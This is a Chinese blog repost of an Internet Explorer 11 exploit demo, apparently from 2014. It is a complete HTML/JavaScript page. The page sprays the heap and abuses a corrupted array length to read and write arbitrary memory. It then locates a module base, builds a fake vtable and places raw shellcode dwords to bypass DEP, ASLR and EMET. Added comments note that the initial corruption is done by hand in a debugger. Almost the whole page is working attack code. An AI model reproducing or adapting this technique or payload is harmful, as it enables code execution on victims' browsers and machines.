【收集】一个IE11的shellcode  

2014-10-29 16:33:30|  分类: 搜集 |  标签: |举报 |字号 订阅
我没有IE11的环境,现在只有XP的IE8,没法测试。

<html>
<script>
/*
 * hacking ie 11: write once, bypass dep/emet without ROP Demo1
 * Author: @bluerust
 * Date  : 2014-03-13
 * Ver   : 1.3
 * Desc  :
 *      a. UAF -> modify data at arbitrarily address
 *      b. bypass DEP, ASLR, EMET without ROP
 * Tested on: x86 + Win7 + 32-bit ie 11 + EMET 5.0.5168.17251   
 * All honour belongs to Ivan Fratric.
 * References:
 *  [1] Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview
 *  http://ifsec.blogspot.jp/2013/11/exploiting-internet-explorer-11-64-bit.html
 * 
 *  !address -f:MEM_COMMIT,MEM_PRIVATE,PAGE_READWRITE,VAR
 *  dd 0x18aa0000
 *
 */
/*
 * Layout constants.  Every address below is a fixed guess about where the
 * sprayed arrays end up on the author's test build (see "Tested on" above).
 * Nothing in this listing checks the guess at runtime, and the "attach
 * windbg" prompt further down shows that the initial memory corruption is
 * applied by hand in a debugger rather than by the page itself.
 */
var guessarrayaddr   = 0x18aa0000>>>0;  // assumed address of one sprayed array; >>>0 keeps it an unsigned 32-bit value
var objectsize       = 0x140;           // assumed byte size of one sprayed element (64 dwords plus an engine header, presumably)
var bufferCapacity   = 0x40;            // 64 dwords per element; indices from bufferCapacity+2 on are expected to fall in the neighbouring object
var spraysize        = 300;  /* mb */

 

// address assumed for the element that follows guessarrayaddr in memory
var arraybase        = (guessarrayaddr + objectsize)>>>0;


// scratch regions carved out of the guessed address; all written through readwriteaddr by the main loop
var shellcodeaddr    = guessarrayaddr + 0x1000;  // where the payload dwords are stored
var fakestructaddr   = guessarrayaddr + 0x2000;  // fake object whose +0x0c slot is set to shellcodeaddr
var fakevftableaddr  = guessarrayaddr + 0x3000;  // copy of the real vtable with one slot replaced
var args             = guessarrayaddr + 0x4000;  // receives modulebase
var arr              = new Array();              // the sprayed elements
var numofelement     = spraysize * 1024 * 1024 / objectsize  + 1;  // spraysize MB worth of objectsize-byte elements
var numofelement1    = numofelement - 1;
var index            = 0;                        // index of the element whose write reached its neighbour
var vftable          = 0;                        // first dword of the neighbouring object, treated as a vtable pointer
var readwriteaddr;                               // the array whose length gets corrupted; every VaToIndex() access goes through it
var modulebase       = 0>>>0;                    // result of SearchModuleBase()

// Spray: allocate numofelement arrays of 64 dwords each so that the guessed
// address is (hopefully) covered by one of them.  0x44444444 is filler only.
for (var i = 0; i < numofelement; i++ )
{
   arr[i] = [ 0x44444444, 0x44444444, 0x44444444, 0x44444444, /* size: 0x140 */
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
             
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
             
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444,
              0x44444444, 0x44444444, 0x44444444, 0x44444444
            ];

    //arr[i].length = 0x18aa0038;
}

// Pauses the page so the author can patch memory by hand in windbg (the
// quoted command writes 0x80 into the guessed array's header).  That manual
// write presumably stands in for the use-after-free named in the header
// comment; the listing itself contains nothing that triggers such a bug, so
// on its own this page is a demonstration of the post-corruption technique,
// not a self-contained exploit.
alert( "Please attach windbg, and then \"ed 18aa0030 80\"" );

/*
 * Convert a virtual address into a dword index of readwriteaddr.
 * Element 0 of that array is assumed to sit at arraybase + 0x38 (0x38 is
 * presumably the engine's array header size on the target build; it is not
 * derived anywhere in the listing).  Addresses below the element base are
 * mapped through 2^32 so the resulting index wraps around the 32-bit address
 * space; that only reaches anything because the main loop sets the array's
 * length to 0x7fffffff first.
 * Returns the byte distance shifted right by two (a dword index).
 */
function VaToIndex( offset )
{
    if (offset >= arraybase + 0x38)
    {
        return (offset - arraybase - 0x38)>>>0x02;
    }
    else
    {
        // address lies below element 0: take the distance modulo 2^32 before the shift
        return (0x100000000 - (arraybase + 0x38 - offset))>>>0x02;
    }
}


/*
 * Inverse of VaToIndex(): map a dword index of readwriteaddr back to a
 * virtual address.  Indices at or above (2^32 - (arraybase + 0x38)) / 4 are
 * the wrapped ones produced by VaToIndex() for addresses below element 0,
 * so they are unwrapped here.  Returns the address as a number.
 */
function IndexToVa( index )
{
    if ( index >= ( (0x100000000 - (arraybase + 0x38))>>>0x02 ) )
    {
        // wrapped index: undo the modulo-2^32 step of VaToIndex()
        return (arraybase + 0x38 ) - (0x100000000 - (index<<0x02));
    }
    else
    {
        return (index << 0x02)+0x38 + arraybase ;
    }
}


/*
 * Read the dword at virtual address `offset` through the length-corrupted
 * array; `>>>0` returns it as an unsigned 32-bit value.  Not called anywhere
 * in this listing.
 */
function GetDwordAtOffset( offset )
{
     return readwriteaddr[VaToIndex(offset)]>>>0;
}


/*
 * Store `value` at virtual address `offset` through the length-corrupted
 * array.  The guard is meant to fold values >= 0x80000000 into their signed
 * int32 form before the store, but `& 0xFFFFFFFF` already yields a signed
 * int32 (both operands are converted with ToInt32), so the comparison is
 * never true and the value is stored unchanged.  Not called anywhere in
 * this listing.
 */
function SetDwordAtOffset( offset, value )
{
    if ( ((value>>>0)&0xFFFFFFFF) >= 0x80000000 )
    {
        value = -(0x100000000 - ((value>>>0)&0xFFFFFFFF));
    }


    readwriteaddr[VaToIndex(offset)]  = value;
}


/*
 * Return the low 16 bits of the dword at virtual address `offset`, read
 * through the length-corrupted array.  Used by SearchModuleBase() to test
 * for the 'MZ' and 'PE' signatures.
 */
function GetLowWord( offset )
{
    return readwriteaddr[VaToIndex(offset)] & 0x0000FFFF;
}


/*
 * Walk backwards one page at a time from the page containing `vftable`
 * until a PE image header is found: 'MZ' (0x5a4d) at the page start and
 * 'PE' (0x4550) at a fixed 0xf8 past it.  The 0xf8 is hard-coded rather than
 * read from the DOS header, so only images laid out like the author's test
 * build match.  The loop has no lower bound: if no header is found it keeps
 * reading downwards until a read faults.  Returns the page address found.
 */
function SearchModuleBase( vftable )
{
    var  addr = (vftable & 0xFFFFF000)>>>0;  // round down to the page containing the vtable
   
    while ( GetLowWord( addr ) != 0x5a4d || GetLowWord( addr + 0xf8 ) != 0x4550 )
    {
        addr -= 0x1000;
    }


    return addr;
}


/*
 * Main routine.  Works from the highest sprayed element downwards and relies
 * on the debugger patch requested by the alert above: the store at index
 * bufferCapacity+2+0x10/4 of arr[i] is expected to land on the length field
 * of the object that follows arr[i] in memory.  When arr[i+1] afterwards
 * reports a length of 0x7fffffff, that adjacency held and arr[i+1] becomes
 * the read/write window (readwriteaddr) behind VaToIndex().  The remaining
 * steps - storing the payload dwords, duplicating the real vtable with one
 * slot replaced, and pointing arr[index]'s vtable slot at the copy - are the
 * "write once, no ROP" technique the header comment names.  The loop
 * variable i is reused as a plain dword index once the window is found; the
 * `break` at the end means the outer loop never sees the reused value.
 */
for (var i = numofelement1 - 1; i >= 0; i-- )
{
   arr[i][bufferCapacity+2+0x10/4] = 0x7fffffff; /* length */  // intended to overwrite the adjacent object's length field
   if ( arr[i+1].length == 0x7fffffff ) /* typeof( arr[]) != "" */  // true only if the store above really reached arr[i+1]
   {
        index                 = i;
        readwriteaddr         = arr[index+1];   // the corrupted array: every VaToIndex() access goes through it
        vftable               = arr[index][bufferCapacity + 0x02];  // first dword of the adjacent object, treated as its vtable pointer
        //alert( vftable.toString( 0x10 ) );
        // further header fields of the adjacent object; their meaning is not stated in the listing
        arr[i][bufferCapacity+2+0x2c/4] = 0x7fffffff;
        arr[i][bufferCapacity+2+0x30/4] = 0x7fffffff;
        arr[i][bufferCapacity+2+0x34/4] = 0x0;
        arr[i][bufferCapacity+2+0x18/4] = arr[i][bufferCapacity+2+0x14/4];

        modulebase             = SearchModuleBase( vftable  );  // image base of the module that owns the vtable
        i                      = VaToIndex(shellcodeaddr);     // i is reused from here on as a dword index into readwriteaddr
        //alert( modulebase.toString(0x10) );
        // Payload dwords stored at shellcodeaddr.  They are opaque data in
        // this listing; nothing here decodes or explains them.
        readwriteaddr[i++] = 0x24748b60;
        readwriteaddr[i++] = 0x20c68124;
        readwriteaddr[i++] = 0x42000000;
        readwriteaddr[i++] = 0x0004fe8b;
        readwriteaddr[i++] = 0x000145b9;
        readwriteaddr[i++] = 0x4434ac00;
        readwriteaddr[i++] = 0x002446aa;
        readwriteaddr[i++] = 0x0024f7e2;
        readwriteaddr[i++] = 0x003000cf;
        readwriteaddr[i++] = 0x00600060;
        readwriteaddr[i++] = 0x008200c5;
        readwriteaddr[i++] = 0x00740044;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00cf0011;
        readwriteaddr[i++] = 0x00c500a8;
        readwriteaddr[i++] = 0x004400a8;
        readwriteaddr[i++] = 0x00440045;
        readwriteaddr[i++] = 0x00e90044;
        readwriteaddr[i++] = 0x00ac0014;
        readwriteaddr[i++] = 0x00440082;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00ac0014;
        readwriteaddr[i++] = 0x00440016;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x009c00cf;
        readwriteaddr[i++] = 0x00f900c9;
        readwriteaddr[i++] = 0x00bb0044;
        readwriteaddr[i++] = 0x00bb00bb;
        readwriteaddr[i++] = 0x00840077;
        readwriteaddr[i++] = 0x000400fd;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00b70044;
        readwriteaddr[i++] = 0x00c900ef;
        readwriteaddr[i++] = 0x004400f9;
        readwriteaddr[i++] = 0x00bb00bb;
        readwriteaddr[i++] = 0x001300bb;
        readwriteaddr[i++] = 0x008300c7;
        readwriteaddr[i++] = 0x00830054;
        readwriteaddr[i++] = 0x00000043;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00130044;
        readwriteaddr[i++] = 0x00840077;
        readwriteaddr[i++] = 0x00140014;
        readwriteaddr[i++] = 0x00140014;
        readwriteaddr[i++] = 0x00140014;
        readwriteaddr[i++] = 0x004d00ac;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00270044;
        readwriteaddr[i++] = 0x00280025;
        readwriteaddr[i++] = 0x006a0027;
        readwriteaddr[i++] = 0x003c0021;
        readwriteaddr[i++] = 0x00440021;
        readwriteaddr[i++] = 0x00bb0014;
        readwriteaddr[i++] = 0x00d40097;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00d400d4;
        readwriteaddr[i++] = 0x00cf00d4;
        readwriteaddr[i++] = 0x001900a1;
        readwriteaddr[i++] = 0x00860025;
        readwriteaddr[i++] = 0x00440040;
        readwriteaddr[i++] = 0x00cf0011;
        readwriteaddr[i++] = 0x00cf00a8;
        readwriteaddr[i++] = 0x004c0019;
        readwriteaddr[i++] = 0x00b700cf;
        readwriteaddr[i++] = 0x00370047;
        readwriteaddr[i++] = 0x00cf0078;
        readwriteaddr[i++] = 0x00c400fa;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00470044;
        readwriteaddr[i++] = 0x00af00bf;
        readwriteaddr[i++] = 0x00cf000e;
        readwriteaddr[i++] = 0x00470043;
        readwriteaddr[i++] = 0x00af0087;
        readwriteaddr[i++] = 0x00b30078;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x003100c4;
        readwriteaddr[i++] = 0x00cf0075;
        readwriteaddr[i++] = 0x0047004c;
        readwriteaddr[i++] = 0x00c5008f;
        readwriteaddr[i++] = 0x0046003d;
        readwriteaddr[i++] = 0x00360007;
        readwriteaddr[i++] = 0x00250021;
        readwriteaddr[i++] = 0x00600031;
        readwriteaddr[i++] = 0x003d00c5;
        readwriteaddr[i++] = 0x00300042;
        readwriteaddr[i++] = 0x00140021;
        readwriteaddr[i++] = 0x00310036;
        readwriteaddr[i++] = 0x00c5005f;
        readwriteaddr[i++] = 0x004e003d;
        readwriteaddr[i++] = 0x0027002b;
        readwriteaddr[i++] = 0x00370021;
        readwriteaddr[i++] = 0x00560031;
        readwriteaddr[i++] = 0x003d00c5;
        readwriteaddr[i++] = 0x0037004a;
        readwriteaddr[i++] = 0x00440005;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x006f004d;
        readwriteaddr[i++] = 0x00470043;
        readwriteaddr[i++] = 0x00540003;
        readwriteaddr[i++] = 0x004400cf;
        readwriteaddr[i++] = 0x005200af;
        readwriteaddr[i++] = 0x008400c7;
        readwriteaddr[i++] = 0x00c70040;
        readwriteaddr[i++] = 0x0044007c;
        readwriteaddr[i++] = 0x00fb0031;
        readwriteaddr[i++] = 0x008300c7;
        readwriteaddr[i++] = 0x00c70050;
        readwriteaddr[i++] = 0x0054003b;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x00c700f4;
        readwriteaddr[i++] = 0x0044007b;
        readwriteaddr[i++] = 0x00ef0031;
        readwriteaddr[i++] = 0x0086008d;
        readwriteaddr[i++] = 0x00440040;
        readwriteaddr[i++] = 0x00cf0011;
        readwriteaddr[i++] = 0x00cf00a8;
        readwriteaddr[i++] = 0x004c0019;
        readwriteaddr[i++] = 0x00b700cf;
        readwriteaddr[i++] = 0x00370047;
        readwriteaddr[i++] = 0x00cf0078;
        readwriteaddr[i++] = 0x00c400fa;
        readwriteaddr[i++] = 0x00440044;
        readwriteaddr[i++] = 0x00470044;
        readwriteaddr[i++] = 0x00af00bf;
        readwriteaddr[i++] = 0x00cf005e;
        readwriteaddr[i++] = 0x0048000b;
        readwriteaddr[i++] = 0x008f0047;
        readwriteaddr[i++] = 0x004600cf;
        readwriteaddr[i++] = 0x007d00c5;
        readwriteaddr[i++] = 0x00370029;
        readwriteaddr[i++] = 0x00270032;
        readwriteaddr[i++] = 0x004f0031;
        readwriteaddr[i++] = 0x003d00c5;
        readwriteaddr[i++] = 0x00360040;
        readwriteaddr[i++] = 0x006a0030;
        readwriteaddr[i++] = 0x00310020;
        readwriteaddr[i++] = 0x00af0046;
        readwriteaddr[i++] = 0x00c70048;
        readwriteaddr[i++] = 0x0054003b;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x00c700a4;
        readwriteaddr[i++] = 0x0048003b;
        readwriteaddr[i++] = 0x00310044;
        readwriteaddr[i++] = 0x00cf009e;
        readwriteaddr[i++] = 0x00540003;
        readwriteaddr[i++] = 0x00870047;
        readwriteaddr[i++] = 0x004400cf;
        readwriteaddr[i++] = 0x00440061;
        readwriteaddr[i++] = 0x00bb00b4;
        readwriteaddr[i++] = 0x002200bb;
        readwriteaddr[i++] = 0x007c00c5;
        readwriteaddr[i++] = 0x001e0009;
        readwriteaddr[i++] = 0x00480031;
        readwriteaddr[i++] = 0x000c00cf;
        readwriteaddr[i++] = 0x00470078;
        readwriteaddr[i++] = 0x0022008c;
        readwriteaddr[i++] = 0x007d00c5;
        readwriteaddr[i++] = 0x00010014;
        readwriteaddr[i++] = 0x00430030;
        readwriteaddr[i++] = 0x00440069;
        readwriteaddr[i++] = 0x00440054;
        readwriteaddr[i++] = 0x00af0044;
        readwriteaddr[i++] = 0x008d00a2;
        readwriteaddr[i++] = 0x00400086;
        readwriteaddr[i++] = 0x00000044;

        // Duplicate the first 0x6a dwords of the real vtable at fakevftableaddr.
        var j = VaToIndex(fakevftableaddr);
        var k = VaToIndex(vftable);
        for ( i = 0; i < 0x6a; i++ )
        {
            readwriteaddr[j++] = readwriteaddr[k++];
        }
       
        // Pattern-search result; the variable name says VirtualProtect, the listing does not confirm it.
        var virtualprotect                               = SearchFunc( modulebase +0x1000 );
        readwriteaddr[VaToIndex(fakevftableaddr + 0x7C)] = virtualprotect;   // the one replaced slot of the copied vtable
        arr[index][bufferCapacity+2]                     = fakevftableaddr;  // point the adjacent object's vtable slot at the copy
        readwriteaddr[VaToIndex(fakestructaddr)]         = 0x0000;
        readwriteaddr[VaToIndex(fakestructaddr + 0x0c)]  = shellcodeaddr;
        // `in` is evaluated for its effect on the engine, not for the boolean;
        // why the author needs it at this point is not explained in the listing.
        if ( fakestructaddr in readwriteaddr )
        {
            readwriteaddr[VaToIndex(fakevftableaddr + 0x7C)] = shellcodeaddr;  // second pass: the same slot now points at the payload
            readwriteaddr[VaToIndex(args)]                   = modulebase;
            if ( shellcodeaddr in readwriteaddr )
            {
                window.location = "http://www.baidu.com";  // presumably just marks the end of the demo
            }
        }
        break;  // only one element is ever processed
   }
}


/*
 * Scan dwords upwards from `base` for a fixed 24-byte instruction sequence
 * and return the virtual address at which it starts.  The four comparison
 * blocks below are the same bytes at the four possible dword alignments
 * (each block is the previous one shifted by one byte), hence the +1/+2/+3
 * on the returned address.  The main loop stores the result in a variable
 * named `virtualprotect`; the listing does not otherwise say which routine
 * the bytes belong to.  The scan has no upper bound: if the pattern is absent
 * it keeps reading until an access faults, so the final `return 0>>>0` is
 * never reached.
 */
function SearchFunc( base )
{
    var index = VaToIndex( base );
    var n, n1, n2, n3, n4, n5;
    while ( 1 )
    {
        // six consecutive dwords, read as unsigned
        n = readwriteaddr[index] >>> 0;
        n1 = readwriteaddr[index + 1] >>> 0;
        n2 = readwriteaddr[index + 2] >>> 0;
        n3 = readwriteaddr[index + 3] >>> 0;
        n4 = readwriteaddr[index + 4] >>> 0;
        n5 = readwriteaddr[index + 5] >>> 0;
       
        // Hard-coded byte search; per the author it succeeded on several minor versions of IE 11.
        if (    n  == 0x8b55ff8b &&  
                n1 == 0x758b56ec &&  
                n2 == 0x017e8008 &&  
                n3 == 0x80297500 &&  
                n4 == 0x2475003e &&
                n5 == 0x00086583
           )
        {
            return IndexToVa( index );
        }
       
        // same bytes, shifted by one
        if (     n == 0xec8b55ff &&  
                n1 == 0x08758b56 &&  
                n2 == 0x00017e80 &&  
                n3 == 0x3e802975 &&  
                n4 == 0x83247500 &&
                n5 == 0x8d000865
            )
        {
            return IndexToVa( index ) + 1;
        }
       
        // same bytes, shifted by two
        if (     n == 0x56ec8b55 &&  
                n1 == 0x8008758b &&  
                n2 == 0x7500017e &&  
                n3 == 0x003e8029 &&  
                n4 == 0x65832475 &&
                n5 == 0x458d0008
            )
        {
            return IndexToVa( index ) + 2;
        } 
       
        // same bytes, shifted by three
        if ( n == 0x8b56ec8b &&  
            n1 == 0x7e800875 &&  
            n2 == 0x29750001 &&  
            n3 == 0x75003e80 &&  
            n4 == 0x08658324 &&
            n5 == 0x08458d00
            )
        {
            return IndexToVa( index ) + 3;
        } 
       
        index++;
    }
   
    return 0>>>0;  // unreachable: the loop above only exits via return
}
</script>
</html>
